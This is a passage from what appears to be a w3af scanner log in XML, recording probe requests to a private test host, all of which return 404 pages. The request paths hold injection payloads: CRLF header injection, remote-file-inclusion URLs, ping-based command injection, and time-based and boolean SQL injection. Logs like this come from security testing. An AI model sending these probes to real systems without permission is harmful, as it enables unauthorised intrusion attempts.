                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="519">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af%0Dvulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="523">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af%0D%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="524">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="526">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="527">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af%0Avulnerable073b%3A+ae5cw3af HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="528">
                <http-request>
                    <status>GET http://10.12.68.43:31337/http%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="529">
                <http-request>
                    <status>GET http://10.12.68.43:31337/http%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="531">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hTtP%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="535">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hTtP%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="550">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="560">
                <http-request>
                    <status>GET http://10.12.68.43:31337/Thread.sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="575">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="657">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="659">
                <http-request>
                    <status>GET http://10.12.68.43:31337/Thread.Sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.Sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="668">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="738">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="756">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="771">
                <http-request>
                    <status>POST http://10.12.68.43:31337/42%22+OR+%2242%22%3D%2242 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="795">
                <http-request>
                    <status>POST http://10.12.68.43:31337/42%22+AND+%2242%22%3D%2243 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="800">
                <http-request>
                    <status>POST http://10.12.68.43:31337/WnYOVzcS HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
